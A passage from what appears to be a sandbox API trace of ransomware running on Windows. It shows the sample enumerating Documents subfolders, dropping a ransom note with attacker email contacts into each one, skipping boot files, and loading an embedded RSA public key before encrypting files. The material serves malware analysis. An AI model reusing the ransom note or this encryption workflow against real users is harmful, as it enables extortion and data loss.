lpSrch="Desktop") returned 0x0 [0044.067] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0044.067] SetErrorMode (uMode=0x1) returned 0x1 [0044.067] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\_HELP_INSTRUCTION.TXT") returned 98 [0044.067] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0044.067] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0044.067] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0x4e8) returned 0x0 [0044.067] RegQueryValueExW (in: hKey=0x4e8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3e11928, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x3e11928*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0044.067] RegCloseKey (hKey=0x4e8) returned 0x0 [0044.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0044.067] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0044.067] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.067] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e8 [0044.068] WriteFile (in: hFile=0x4e8, lpBuffer=0x17839c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x178394, lpOverlapped=0x0 | out: lpBuffer=0x17839c*, lpNumberOfBytesWritten=0x178394*=0x2c4, lpOverlapped=0x0) returned 1 [0044.068] CloseHandle (hObject=0x4e8) returned 1 [0044.069] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x42e53d0 [0044.069] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV") returned="ZW28zqHzfxAY2NV" [0044.069] lstrcpyW (in: lpString1=0x17a5a4, lpString2="ZW28zqHzfxAY2NV" | out: lpString1="ZW28zqHzfxAY2NV") returned="ZW28zqHzfxAY2NV" [0044.069] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.069] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.069] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0044.069] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.069] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0044.069] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0044.069] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0044.069] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0044.069] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0044.069] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0044.069] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0044.069] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0044.069] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0044.069] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0044.069] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0044.069] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0044.069] FindClose (in: hFindFile=0x42e53d0 | out: hFindFile=0x42e53d0) returned 1 [0044.069] FindClose (in: hFindFile=0x42e53d0 | out: hFindFile=0x42e53d0) returned 0 [0044.069] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0044.069] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0044.069] FindClose (in: hFindFile=0x42e4f90 | out: hFindFile=0x42e4f90) returned 1 [0044.069] FindClose (in: hFindFile=0x42e4f90 | out: hFindFile=0x42e4f90) returned 0 [0044.070] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0044.070] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0044.070] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0044.070] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0044.070] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0044.070] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" [0044.070] SetErrorMode (uMode=0x1) returned 0x1 [0044.070] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" [0044.070] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\" [0044.070] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\" [0044.070] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*" [0044.070] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0044.070] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0044.070] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" [0044.070] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*" [0044.070] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="Desktop") returned 0x0 [0044.070] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="DESKTOP") returned 0x0 [0044.070] SetErrorMode (uMode=0x1) returned 0x1 [0044.070] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\_HELP_INSTRUCTION.TXT") returned 70 [0044.070] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0044.070] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0044.071] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x4f8) returned 0x0 [0044.071] RegQueryValueExW (in: hKey=0x4f8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3e11b58, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3e11b58*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0044.071] RegCloseKey (hKey=0x4f8) returned 0x0 [0044.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0044.071] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0044.071] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my music\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.071] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my music\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f8 [0044.071] WriteFile (in: hFile=0x4f8, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0044.072] CloseHandle (hObject=0x4f8) returned 1 [0044.072] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0044.072] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0044.072] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0044.072] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0044.072] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0044.072] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0044.072] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0044.072] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" [0044.072] SetErrorMode (uMode=0x1) returned 0x1 [0044.072] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" [0044.072] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\" [0044.072] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\" [0044.072] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*" [0044.072] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0044.072] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0044.072] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" [0044.072] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*" [0044.072] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="Desktop") returned 0x0 [0044.072] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="DESKTOP") returned 0x0 [0044.072] SetErrorMode (uMode=0x1) returned 0x1 [0044.072] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT") returned 73 [0044.072] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0044.072] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0044.072] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x4f8) returned 0x0 [0044.073] RegQueryValueExW (in: hKey=0x4f8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3e11d88, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3e11d88*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0044.073] RegCloseKey (hKey=0x4f8) returned 0x0 [0044.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0044.073] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0044.073] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my pictures\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.073] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my pictures\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f8 [0044.073] WriteFile (in: hFile=0x4f8, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0044.073] CloseHandle (hObject=0x4f8) returned 1 [0044.074] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0044.074] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0044.074] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0044.074] lstrcmpW (lpString1="My Shapes", lpString2="..") returned 1 [0044.074] lstrcmpW (lpString1="My Shapes", lpString2=".") returned 1 [0044.074] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0044.074] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0044.074] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Shapes" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0044.074] SetErrorMode (uMode=0x1) returned 0x1 [0044.074] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0044.074] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0044.074] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0044.074] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*" [0044.074] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x42e4f90 [0044.075] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="My Shapes" [0044.075] lstrcpyW (in: lpString1=0x17b644, lpString2="My Shapes" | out: lpString1="My Shapes") returned="My Shapes" [0044.075] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0044.075] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0044.075] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0044.075] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0044.075] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0044.075] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0044.075] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0044.075] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0044.075] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0044.075] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="Desktop") returned 0x0 [0044.075] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="DESKTOP") returned 0x0 [0044.075] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned 54 [0044.075] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0044.075] lstrcpyW (in: lpString1=0x17be7c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0044.075] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") 